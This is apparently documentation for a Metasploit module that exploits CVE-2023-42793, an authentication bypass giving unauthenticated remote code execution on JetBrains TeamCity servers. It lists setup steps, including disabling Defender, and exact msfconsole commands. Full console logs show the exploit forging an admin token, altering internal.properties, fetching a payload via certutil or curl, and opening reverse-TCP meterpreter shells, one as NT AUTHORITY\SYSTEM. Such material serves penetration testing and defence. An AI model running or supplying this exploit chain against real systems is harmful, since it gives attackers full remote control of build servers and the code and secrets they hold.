## Vulnerable Application
This module exploits an authentication bypass vulnerability to achieve unauthenticated remote code execution
against a vulnerable JetBrains TeamCity server. All versions of TeamCity prior to version 2023.05.4 are
vulnerable to this issue. The vulnerability was originally discovered by SonarSource.

For a full technical analysis of the vulnerability read the
[Rapid7 AttackerKB Analysis](https://attackerkb.com/topics/1XEEEkGHzt/cve-2023-42793/rapid7-analysis).

## Testing
Download and install a vulnerable version of TeamCity for Windows, version
[2023.05.3](https://download.jetbrains.com/teamcity/TeamCity-2023.05.3.exe). By default the server will listen for HTTP
connections on port 8111.

## Verification Steps
Note: On Windows, disable Defender if you are using the default payloads.

Steps:
1. Start msfconsole
2. `use exploit/multi/http/jetbrains_teamcity_rce_cve_2023_42793`
3. `set RHOST 192.168.86.50`
4. `set RPORT 8111`
5. Set a Target:
    * `set target 0` for Windows.
    * `set target 1` for Linux.
6. Set a suitable command based PAYLOAD:
    * `set PAYLOAD cmd/windows/http/x64/meterpreter/reverse_tcp` for Windows.
    * `set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp` for Linux.
7. Change the FETCH_WRITABLE_DIR if needed:
    * `set FETCH_WRITABLE_DIR %TEMP%` for Windows.
    * `set FETCH_WRITABLE_DIR /tmp` for Linux.
8. `check`
9. `exploit`

## Scenarios

### Windows
```
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > show options

Module options (exploit/multi/http/jetbrains_teamcity_rce_cve_2023_42793):

   Name                     Current Setting  Required  Description
   ----                     ---------------  --------  -----------
   Proxies                                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT                    8111             yes       The target port (TCP)
   SSL                      false            no        Negotiate SSL/TLS for outgoing connections
   TEAMCITY_ADMIN_ID        1                yes       The ID of an administrator account to authenticate as
   TEAMCITY_CHANGE_TIMEOUT  30               yes       The timeout to wait for the changes to be applied
   VHOST                                     no        HTTP server virtual host


Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   FETCH_COMMAND       CERTUTIL         yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      xwOdwhbLavjs     no        Name to use on remote system when storing payload; cannot contain spaces.
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               192.168.86.42    yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > set RHOST 192.168.86.50
RHOST => 192.168.86.50
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > set RPORT 8111
RPORT => 8111
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > check
[+] 192.168.86.50:8111 - The target is vulnerable. JetBrains TeamCity 2023.05.3 (build 129390) detected.
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > exploit

[*] Started reverse TCP handler on 192.168.86.42:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. JetBrains TeamCity 2023.05.3 (build 129390) detected.
[*] Created authentication token: eyJ0eXAiOiAiVENWMiJ9.c2ozbE1aYXdTNnhlVlRJRGdEeEU0c2VoQ1Qw.MTlkZjQ2YTktOTc1MS00YzRlLWEwMGEtYzE0ODEyZjZmMzIw
[*] Modifying internal.properties to allow process creation...
[*] Waiting for configuration change to be applied...
[*] Executing payload...
[*] Resetting the internal.properties settings...
[*] Sending stage (200774 bytes) to 192.168.86.50
[*] Deleting the authentication token.
[*] Meterpreter session 1 opened (192.168.86.42:4444 -> 192.168.86.50:51978) at 2023-09-28 12:20:48 +0100

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-V28QNSO2H05
OS              : Windows 2016+ (10.0 Build 20348).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > 
```

### Linux
```
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > show options

Module options (exploit/multi/http/jetbrains_teamcity_rce_cve_2023_42793):

   Name                     Current Setting  Required  Description
   ----                     ---------------  --------  -----------
   Proxies                                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                   192.168.86.43    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT                    8111             yes       The target port (TCP)
   SSL                      false            no        Negotiate SSL/TLS for outgoing connections
   TEAMCITY_ADMIN_ID        1                yes       The ID of an administrator account to authenticate as
   TEAMCITY_CHANGE_TIMEOUT  30               yes       The timeout to wait for the changes to be applied
   VHOST                                     no        HTTP server virtual host


Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      zpqZhbbEUzyX     no        Name to use on remote system when storing payload; cannot contain spaces.
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               192.168.86.42    yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > exploit

[*] Started reverse TCP handler on 192.168.86.42:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. JetBrains TeamCity 2023.05.3 (build 129390) detected.
[*] Created authentication token: eyJ0eXAiOiAiVENWMiJ9.Y0F2UmpEc01hQzVQRjl3a2V3QWxoZ1pzdlg4.MmRhZTM5OTctY2MxZS00YmExLWIzZmYtOTUxOWZlZTBhNWUw
[*] Modifying internal.properties to allow process creation...
[*] Waiting for config change to be picked up...
[*] Waiting for config change to be picked up...
[*] Executing payload...
[*] Sending stage (3045380 bytes) to 192.168.86.43
[*] Resetting the internal.properties settings...
[*] Deleting the authentication token.
[*] Meterpreter session 8 opened (192.168.86.42:4444 -> 192.168.86.43:50210) at 2023-09-28 14:43:13 +0100

meterpreter > sysinfo
Computer     : 192.168.86.43
OS           : Ubuntu 22.04 (Linux 6.2.0-33-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```
